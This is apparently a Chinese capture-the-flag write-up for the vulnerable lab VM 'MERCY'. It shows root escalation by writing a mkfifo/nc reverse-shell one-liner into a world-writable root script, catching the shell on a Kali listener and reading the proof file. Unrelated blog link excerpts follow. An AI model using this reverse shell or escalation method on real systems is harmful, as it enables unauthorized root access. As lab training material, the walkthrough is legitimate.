fluffy@MERCY:~/.private$ pwd
pwd
/home/fluffy/.private
fluffy@MERCY:~/.private$ ls -al
ls -al
total 12
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 .
drwxr-x--- 3 fluffy fluffy 4096 Nov 20  2018 ..
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 secrets
fluffy@MERCY:~/.private$ cd secrets
cd secrets
fluffy@MERCY:~/.private/secrets$ ls -al
ls -al
total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..
-rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
-rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
-rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock
fluffy@MERCY:~/.private/secrets$

在这个用户主目录下,找到一个具有root权限的可执行文件,fluffy具有可读可写的权限!

开始提权!

本地提权
fluffy@MERCY:~/.private/secrets$ cat timeclock
cat timeclock
#!/bin/bash

now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time
fluffy@MERCY:~/.private/secrets$

fluffy@MERCY:~/.private/secrets$ ./timeclock
./timeclock
./timeclock: line 4: ../../../../../var/www/html/time: Permission denied
./timeclock: line 5: ../../../../../var/www/html/time: Permission denied
chown: changing ownership of ‘../../../../../var/www/html/time’: Operation not permitted
rm: remove write-protected fifo ‘/tmp/f’? n
n
mkfifo: cannot create fifo ‘/tmp/f’: File exists
./timeclock: line 7: /tmp/f: Permission denied


写入payload  
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.12.128 5656 >/tmp/f

解释:
rm /tmp/f;  # 删除可能存在的名为 f 的文件,以确保后续 mkfifo 不会失败
mkfifo /tmp/f;  # 创建一个命名管道,文件名为 /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.12.128 5656 > /tmp/f;  # 将 /tmp/f 的输出通过 nc 命令发送到指定的 IP 和端口上,同时通过管道连接一个交互式的 shell

kali开启监听!

执行!
get root
┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 5656
listening on [any] 5656 ...
192.168.12.142: inverse host lookup failed: Unknown host
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.142] 46290
/bin/sh: 0: can't access tty; job control turned off

# python3 -c 'import pty;pty.spawn("/bin/bash")'

root@MERCY:~# cd /root
cd /root

root@MERCY:~# pwd
pwd
/root

root@MERCY:~# ls
ls
author-secret.txt  config  proof.txt

root@MERCY:~# cat proof.txt
cat proof.txt
Congratulations on rooting MERCY. :-)

root@MERCY:~# cat author-secret.txt
cat author-secret.txt
Hi! Congratulations on being able to root MERCY.

The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.

The author would also like to thank a great friend who he always teases as "plead for mercy". She has been awesome. The author, in particular, appreciates her great heart, candour, and her willingness to listen to the author's rants and troubles. The author will stay forever grateful for her presence. She never needed to be this friendly to the author.

The author, as "plead for mercy" knows, is terrible at any sort of dedication or gifting, and so the best the author could do, I guess, is a little present, which explains the hostname of this box. (You might also have been pleading for mercy trying to root this box, considering its design.)

You'll always be remembered, "plead for mercy", and Offensive Security, for making me plead for mercy!

Congratulations, once again, for you TRIED HARDER!

Regards,
The Author

root@MERCY:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:50:56:3e:71:fc brd ff:ff:ff:ff:ff:ff
    inet 192.168.12.142/24 brd 192.168.12.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe3e:71fc/64 scope link
       valid_lft forever preferred_lft forever
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default qlen 1000
    link/ether c2:55:fe:e4:34:b2 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
       valid_lft forever preferred_lft forever
       
root@MERCY:~# whoami
whoami
root

root@MERCY:~#

译:

你好祝贺您能够根除MERCY。
作者对这个盒子感到苦乐参半。一方面,这是一个盒子,旨在纪念PWK的进攻安全团队所经历的苦难。我想我也会通过制造一台易受攻击的机器来支付这笔钱。这并不是一台特别困难的机器,而是通过各种技术让您完成大量列举步骤。
作者还要感谢一位好朋友,他总是调侃他“求饶”。她太棒了。作者尤其欣赏她那颗伟大的心、坦率的态度,以及她愿意倾听作者的咆哮和烦恼。作者将永远感激她的光临。她从来没有必要对作者如此友好。
正如“求饶”所知,作者在任何形式的奉献或礼物方面都很糟糕,所以我想,作者能做的最好的事情就是送一份小礼物,这就解释了这个盒子的主机名。(考虑到这个盒子的设计,你可能也在乞求宽恕,试图根除它。)
你将永远被铭记,“求饶”和“进攻安全”,因为你让我求饶!
再次祝贺你更加努力!
当做
作者

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/266074.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

天文与计算机:技术的星辰大海

天文与计算机&#xff1a;技术的星辰大海 一、引言 在人类的历史长河中&#xff0c;天文学与计算机技术这两个领域似乎相隔甚远&#xff0c;然而在科技的推动下&#xff0c;它们却逐渐走到了一起&#xff0c;为人类对宇宙的探索开辟了新的道路。天文观测的复杂度与数据量随着…

C++面向对象(OOP)编程-STL详解(vector)

本文主要介绍STL六大组件&#xff0c;并主要介绍一些容器的使用。 目录 1 泛型编程 2 CSTL 3 STL 六大组件 4 容器 4.1 顺序性容器 4.1.1 顺序性容器的使用场景 4.2 关联式容器 4.2.1 关联式容器的使用场景 4.3 容器适配器 4.3.1 容器适配器的使用场景 5 具体容器的…

Java经典框架之Spring

Java经典框架之Spring Java 是第一大编程语言和开发平台。它有助于企业降低成本、缩短开发周期、推动创新以及改善应用服务。如今全球有数百万开发人员运行着超过 51 亿个 Java 虚拟机&#xff0c;Java 仍是企业和开发人员的首选开发平台。 课程内容的介绍 1. Spring简介 2.…

20231220将NanoPC-T4(RK3399)开发板的Android10的SDK按照Rockchip官方挖掘机开发板编译打包刷机之后启动跑飞

20231220将NanoPC-T4(RK3399)开发板的Android10的SDK按照Rockchip官方挖掘机开发板编译打包刷机之后启动跑飞 2023/12/20 17:19 简略步骤&#xff1a;rootrootrootroot-X99-Turbo:~/3TB$ tar --use-compress-programpigz -xvpf rk3399-android-10.git-20210201.tgz rootrootro…

HarmonyOS4.0系统性深入开发02 UIAbility组件详解(上)

UIAbility组件概述 概述 UIAbility组件是一种包含UI界面的应用组件&#xff0c;主要用于和用户交互。 UIAbility组件是系统调度的基本单元&#xff0c;为应用提供绘制界面的窗口&#xff1b;一个UIAbility组件中可以通过多个页面来实现一个功能模块。每一个UIAbility组件实例…

智能优化算法应用:基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用&#xff1a;基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码 文章目录 智能优化算法应用&#xff1a;基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.爬行动物算法4.实验参数设定5.算法结果6.…

Android Canvas画布saveLayer与对应restoreToCount,Kotlin

Android Canvas画布saveLayer与对应restoreToCount&#xff0c;Kotlin private fun mydraw() {val originBmp BitmapFactory.decodeResource(resources, R.mipmap.pic).copy(Bitmap.Config.ARGB_8888, true)val newBmp Bitmap.createBitmap(originBmp.width, originBmp.heigh…

【数据结构一】初始Java集合框架(前置知识)

Java中的数据结构 Java语言在设计之初有一个非常重要的理念便是&#xff1a;write once&#xff0c;run anywhere&#xff01;所以Java中的数据结构是已经被设计者封装好的了&#xff0c;我们只需要实例化出想使用的对象&#xff0c;便可以操作相应的数据结构了&#xff0c;本篇…

数值分析期末复习

第一章 科学计算 误差 解题步骤 先求绝对误差: ∣ x − x ∗ ∣ |x - x^*| ∣x−x∗∣求相对误差限: ∣ x − x ∗ ∣ x ∗ \frac{|x\,\,-\,\,x^*|}{x^*} x∗∣x−x∗∣​求有效数字 ∣ x − x ∗ ∣ 需要小于它自身的半个单位 |x-x^*|\text{需要小于它自身的半个单位} ∣…

qt简单连接摄像头

要使用摄像头&#xff0c;就需要链接多媒体模块以及多媒体工具模块 需要在.pro文件中添加QT multimedia multimediawidgets 是用的库文件 QCamera 类用于打开系统的摄像头设备&#xff0c; QCameraViewfinder 用于显示捕获的视频&#xff0c; QCameraImageCapt…

3D 纹理贴图基础知识

在线工具推荐&#xff1a; 3D数字孪生场景编辑器 - GLTF/GLB材质纹理编辑器 - 3D模型在线转换 - Three.js AI自动纹理开发包 - YOLO 虚幻合成数据生成器 - 三维模型预览图生成器 - 3D模型语义搜索引擎 介绍 纹理贴图是创建模型时离不开的最后一块拼图。同样&#xff0c;…

陈可之|三峡|《河水不犯井水的游戏》

《河水不犯井水的游戏》 尺寸&#xff1a;130x90cm 陈可之2007年绘 油画《河水不犯井水的游戏》是陈可之先生三峡系列作品之一&#xff0c;巧借古代传说&#xff0c;并具象化为螃蟹、乌龟、长江水&#xff0c;描绘了一幅和谐共生的画面。 画面右侧&#xff0c;蜿蜒宽阔的长江水…

内存函数的学习

额外知识点 第一个 假设c为int类型&#xff0c;&#xff08;char&#xff09;c之后&#xff0c;之后如果还用变量c的话&#xff0c;c依然为int类型。&#xff08;&#xff09;强制转换操作符并不会永久改变原本的变量类型。 第二个 \0在打印时不会显示出来 第三个 void …

Latex生成的PDF中加入书签/Navigation/导航

本文参考&#xff1a;【Latex学习】在生成pdf中加入书签/目录/提纲_latex 书签-CSDN博客 &#xff08;这篇文章写的真的太棒了&#xff01;非常推荐&#xff09; 题外话&#xff0c;我的碎碎念&#xff0c;这也是我如何提高搜索能力的办法&#xff1a;想在Latex生成的PDF中加入…

解决用Fiddler抓包,网页显示你的连接不是专用/私密连接

关键&#xff1a;重置fiddler的证书 在Fiddler重置证书 1、Actions --> Reset All Certificates --> 弹窗一路yes 2、关掉Fiddler&#xff0c;重新打开 3、手机删掉证书&#xff0c;重新下载安装。 &#xff08;如果还不行&#xff0c;重新试一遍&#xff0c;先把浏览器…

用python对航空公司客户价值进行聚类分析

1.实验目的 1.会用Python创建KMeans聚类分析模型&#xff1b; 2.使用KMeans模型对航空公司客户价值进行聚类分析&#xff1b; 3.会对聚类结果进行分析 2.实验设备 Jupyter notebook 3.实验原理 4.实验内容 使用sklearn.cluester的KMeans类对航空公司客户数据进行聚类分析&…

Springboot+vue的装饰工程管理系统(有报告),Javaee项目,springboot vue前后端分离项目

演示视频&#xff1a; Springbootvue的装饰工程管理系统&#xff08;有报告&#xff09;&#xff0c;Javaee项目&#xff0c;springboot vue前后端分离项目 项目介绍&#xff1a; 本文设计了一个基于Springbootvue的前后端分离的装饰工程管理系统&#xff0c;采用M&#xff08…

TSINGSEE青犀可视化视频云平台JT/T1078接入能力在智慧物流中的应用

一、引言 随着科技的快速发展和全球贸易的蓬勃发展&#xff0c;智慧物流成为了现代物流业的重要发展方向。智慧物流通过引入先进的信息技术&#xff0c;实现了物流过程的自动化、智能化和信息化&#xff0c;从而提高了物流效率和准确性。在这个过程中&#xff0c;JT/T1078接入…

天文观测与计算机技术:粉丝的视角

天文观测与计算机技术&#xff1a;粉丝的视角 在浩瀚无垠的宇宙中&#xff0c;每一颗星星都像是神秘的密码&#xff0c;等待我们去破译。作为天文观测的粉丝&#xff0c;我深知每一个美丽的星图背后都离不开计算机技术的支持。在这篇文章中&#xff0c;我将分享我对天文观测与…

蓝桥杯第二场小白入门赛(1~5)(对不起,我线段树太菜了)

1.模拟 2.贪心 3.二分 4.数论 5.数论 6.线段树&#xff08;线段树还是练少了...&#xff09; 1. 蓝桥小课堂-平方和 直接模拟&#xff0c;注意数据范围 #include <bits/stdc.h> using namespace std; #define LL long long #define pb push_back #define x first …